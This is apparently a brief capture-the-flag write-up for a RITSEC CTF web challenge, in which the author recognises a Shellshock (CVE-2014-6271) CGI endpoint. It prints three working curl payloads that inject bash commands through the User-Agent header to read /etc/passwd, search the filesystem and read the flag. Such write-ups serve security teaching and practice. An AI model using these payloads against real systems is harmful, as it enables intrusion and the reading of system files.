What a cute dog! [Web – 350 Points]- RITSEC CTF

Challenge description

This dog is shockingly cute!

fun.ritsec.club:8008

Author: sandw1ch

Ok. let’ check the url and view the source code

/cgi-bin/stats. Ok. i try to search google “/cgi-bin/stats”

It CVE 2014-6271. Time to exploit.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://fun.ritsec.club:8008/cgi-bin/stats

Find the flag with command.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

And than read flag.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

Flag is

RITSEC{sh3ll_sh0cked_w0wz3rs}

Thanks for reading..